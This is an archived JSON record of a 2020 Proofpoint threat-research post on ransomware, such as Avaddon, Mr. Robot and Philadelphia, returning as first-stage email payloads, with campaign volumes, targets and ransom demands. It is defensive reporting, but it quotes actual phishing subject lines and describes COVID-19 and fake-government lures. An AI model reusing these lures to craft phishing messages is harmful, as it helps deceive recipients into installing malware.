{
	"id": "6cd10e29-3f09-4d77-8ba2-8e3cf9807b48",
	"created_at": "2026-04-06T00:11:09.534763Z",
	"updated_at": "2026-04-10T03:21:51.562395Z",
	"deleted_at": null,
	"sha1_hash": "e9912122ce4fc111cf3e3911f430db50c2313dd8",
	"title": "Ransomware Families Reemerge: Avaddon \u0026 More | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1114664,
	"plain_text": "Ransomware Families Reemerge: Avaddon \u0026 More | Proofpoint\r\nUS\r\nBy June 25, 2020 Sherrod DeGrippo and the Proofpoint Threat Research Team\r\nPublished: 2020-06-25 · Archived: 2026-04-05 18:57:12 UTC\r\nIn the past month, Proofpoint researchers have observed a slight increase in email-based ransomware attacks using\r\nransomware as a first-stage payload. This is notable because for the past year or more attackers have used\r\ndownloaders as the first-stage payload, which then deliver ransomware as the second- or later-stage payload. A\r\nsmall increase in the amount of ransomware sent as a first-stage payload via email campaigns may herald the\r\nreturn of the large ransomware campaigns we saw in 2018.\r\nThese attacks have featured many different families of ransomware and have targeted numerous industries in the\r\nUnited States, France, Germany, Greece, and Italy. They often use native language lures and messages.\r\nRansomware families we’ve seen as first-stage payloads include among others:\r\nAvaddon (a new family)\r\nBuran (named for the Russian Space Shuttle)\r\nDarkgate\r\nPhiladelphia (something previously seen by Proofpoint in 2017)\r\nMr. Robot\r\nRanion\r\nEach of these ransomware families encrypts the victim's files and holds them ransom for a payment.\r\nDaily volumes ranged from one to as many as 350,000 messages in each campaign, and over one million\r\nmessages between June 4 – 10, 2020 featured Avaddon ransomware. We’ve seen a variety of themes in these\r\nransomware messages, including some that exploit COVID-19, and numerous industries were targeted. These\r\nverticals include education and manufacturing followed by transportation, entertainment, technology, healthcare,\r\nand telecommunications.\r\nBelow are Avaddon, Mr. Robot, and Philadelphia examples:\r\nAvaddon\r\nAvaddon, a newer ransomware that has targeted U.S. organizations, is notable because it has its own branding and\r\nis often part of large-scale campaigns. Over one million messages with Avaddon as the payload were sent June 4-\r\n10, 2020, and over 750,000 messages were sent on June 6, 2020 alone. These campaigns were primarily sent to\r\nmanufacturing, education, media, and entertainment organizations. The June 4, 2020 Avaddon ransomware\r\ncampaign focused almost exclusively on transportation companies and school districts.\r\nAvaddon is an example of “ransomware-as-a-service” (RaaS), where threat actors pay others for the use of the\r\nransomware rather than building the ransomware and infrastructure themselves.\r\nhttps://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more\r\nPage 1 of 6\n\nRecent Avaddon ransomware messages featured subject lines like\r\n“Do you know him?”\r\n“Our old picture”\r\n“Photo for you”\r\n“Do you like my photo?”\r\n“Is this you?”\r\n“Your new photo?”\r\n“I like this photo”\r\nWhen opened, the included attachment downloads Avaddon using PowerShell. Once Avaddon runs, it shows the\r\nransom message in Figure 1 and later demands $800 payment in bitcoin via TOR. The Avaddon attackers also\r\nprovide 24/7 support and resources on purchasing bitcoin, testing files for decryption, and other challenges that\r\nmay hinder victims from paying the ransom.\r\nhttps://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more\r\nPage 2 of 6\n\nFigure 1 Avaddon Infection Message\r\nMr. Robot\r\nThis Mr. Robot ransomware attack used a COVID-19 lure to persuade targeted users to click. Between May 19-\r\nJune 1, 2020, a series of Mr. Robot campaigns targeted U.S. entertainment, manufacturing, and construction\r\norganizations.\r\nRecipients of these campaigns are sent messages claiming to be from “Departament (sic) of health”, “Departament\r\n(sic) of health \u0026 human services”, “Health Service”, and “Health Care” with subject lines like:\r\nhttps://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more\r\nPage 3 of 6\n\nYour COVID19 results are ready / 85108\r\nYour COVID19 results are ready # 85513\r\nYour COVID_19 results # 99846\r\nView your COVID19 result # 99803\r\nhuman immunodeficiency virus analysis # 93545\r\nCOVID19 virus test result / 61043\r\nCOVID19 virus result / 64745\r\nCOVID19 virus analysis # 83273\r\nCheck your COVID_19 test # 65619\r\nYour COVID_19 Results No 80420\r\nThe recipient is encouraged to click a link in the message as shown in Figure 2. If clicked, Mr. Robot ransomware\r\ninstalls, and a $100 payment demand appears.\r\nFigure 2 Mr. Robot COVID-19 Lure\r\nhttps://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more\r\nPage 4 of 6\n\nPhiladelphia\r\nAfter a nearly three-year hiatus, Philadelphia ransomware has returned with a campaign primarily targeting\r\nmanufacturing and food and beverage companies in Germany with German-language lures (Figure 3).\r\nThese messages claim to come from “Federal Germany Government” and use the flag and insignia of the Federal\r\nRepublic of Germany, along with a subject that states: “Die Entscheidung, Ihr Unternehmen aufgrund von Covid-19 zu schließen” (translated: “The decision to close your company due to Covid-19”). The recipient is encouraged\r\nto click the link which installs Philadelphia as a first-stage payload and shows a ransom message demanding (in\r\nEnglish) payment of 200 Euros as shown in Figure 4.\r\nFigure 3 Philadelphia German Lure\r\nhttps://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more\r\nPage 5 of 6\n\nFigure 4 Philadelphia Ransom Note\r\nThis recent emergence of ransomware as an initial payload is unexpected after such a long, relatively quiet period.\r\nThe change in tactics could be an indicator that threat actors are returning to ransomware and using it with new\r\nlures. Various actors trying ransomware payloads as the first stage in email has not been seen in significant\r\nvolumes since 2018. While these volumes are still comparatively small, this change is noteworthy. The full\r\nsignificance of this shift isn’t yet clear, what is clear is that the threat landscape is changing rapidly, and defenders\r\nshould continue to expect the unexpected.\r\nSource: https://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more\r\nhttps://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/security-briefs/ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more"
	],
	"report_names": [
		"ransomware-initial-payload-reemerges-avaddon-philadelphia-mr-robot-and-more"
	],
	"threat_actors": [],
	"ts_created_at": 1775434269,
	"ts_updated_at": 1775791311,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e9912122ce4fc111cf3e3911f430db50c2313dd8.pdf",
		"text": "https://archive.orkl.eu/e9912122ce4fc111cf3e3911f430db50c2313dd8.txt",
		"img": "https://archive.orkl.eu/e9912122ce4fc111cf3e3911f430db50c2313dd8.jpg"
	}
}